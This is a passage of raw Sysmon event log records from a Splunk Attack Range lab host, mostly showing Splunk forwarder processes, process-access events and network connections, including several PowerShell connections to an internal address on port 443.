Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.381{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=743976A6E0D3BDE5B38B86890EB32095,SHA256=402261901945ADC766AF0F1DBF480E2D9CD2C296880741A7A6403AAD8868B126,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:37.077{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56474-false10.0.1.12-8000- 23542300x800000000000000035083422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=795DB499E27C033CFBA036492BC645C5,SHA256=A64402693DF73FB84C00DD1946F1B2DD939249528257CA9C8BBAD84DFBAFAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0B4A001CECB78EC6862B9988C0CFA84,SHA256=0AA7D6052E66108C4D887B67896B143D39A1C8132C7AC7F68F35FC5E32B2D306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFB4671832566D5C49B8B35DF2D52AF1,SHA256=98D4894164DAFDBFF752F2C53E12A3BA5B7D4BD48B6AC3B83DB3BE8876D09B7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.084{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.082{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.082{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.064{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:15.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FFC536170E9CAF2EE496B01B7500E22,SHA256=04C473809EA9F478BEB05E3479AB7D158B025B0EC13426F06E9543C750E0F031,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:16.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2109CCCDC59BD1AD76F0750A02A80AD,SHA256=4DB96EC61359948E4FC3F4AD2F7821FC244C7C10B116B5E90DB573C095878FDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:41.090{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56475-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:16.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6E5F0542AB3041F4775D8E74D19606FA,SHA256=02C60C26E326288050F9FF5A80E852557F2EBAEAEDA094317133F721B299CAAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:17.514{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=306DD84E9C167236D591FB5601F26328,SHA256=12FC9FBFAFE0FB95C9F0D17610C02FA6C55574CD58E544C4189CB3EED765FD7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:18.560{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58024C83140147BFF0FC6A1CBA46C8F0,SHA256=40DD370EACE6E728B37A50909F9697F83880CEEE264811E6BB38270FE1701DBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:42.188{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56476-false10.0.1.12-8000- 23542300x800000000000000035083430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:19.596{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF7F7060461F8F6312AFDFEA4F8A4E8,SHA256=1A367F2863736A38AA78EFA605814369159C64867FD566250984D19173A64316,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6161CD269F8996AC42C464CA6A8607B,SHA256=661AD7A1F351682E241BCC9EDD6622D99841849BF001A7EDC41D06990994F055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.108{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56477-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D251FEC1BBFE32AF22499BB61D192541,SHA256=35145F0A2973DE7065766FB22FD246AAA6EBAE5F38A43D2E17DBFFDE786EDA14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:21.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=644FF3B2A19442E1B668CF19DCC37CB4,SHA256=6E6F0AB673EBFAACD91ED70BCA54A09F968B38F4A597F3644A05D717B48DB8CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:22.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23BD186E718D9CF94998FDEC8B21D2D,SHA256=847003FF18AEA1D0A96C8525BD12BCF2FE24D5461704CF1C0986B7C11FC99E25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:23.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F03EE6AB1C46FD4686CE86875FA66B3,SHA256=55FF28708553244DA184D27C073113FE9B4809F3707F67DD530AD993E382087C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:24.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=906B80DB7C55838023D496E218F3C20F,SHA256=35C87B0B6898D9EBD98358838DD272619E5D097E12561E89F6B840A4766C84D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:49.119{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56479-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:48.104{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56478-false10.0.1.12-8000- 23542300x800000000000000035083437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:24.337{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9E35F46EDF48FD5346ACF4738C75D91B,SHA256=4A44EB7538F97AA030DECCE4C02CBBB149357603A4BCE82B99478501CA754D4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:25.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06561474BE9C0CD5CF3DF1B7D91B813F,SHA256=457738C08150770CB8575125D71DB058B065CC859F242793BB60BB26C93F9BAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:26.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DF0655A5AE87D4ABE0AF5C098807F7,SHA256=016EED85ACAAC45DD925D4401DFF3AA4AB90F30CC48CA6695768753D20798DC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:27.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B250B5DE91693DB2C243A543BDFFA4C4,SHA256=6357924ED2DE4839FAA1F3BBB9C74A22849A9B18C45AA28384F96095222E111B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D760F32BE6B2EDF3B77158B0585610,SHA256=041763C23A8A06DE038FEDB942A9DF6A86993C3C84AD5B2F471F8922BDA5534F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 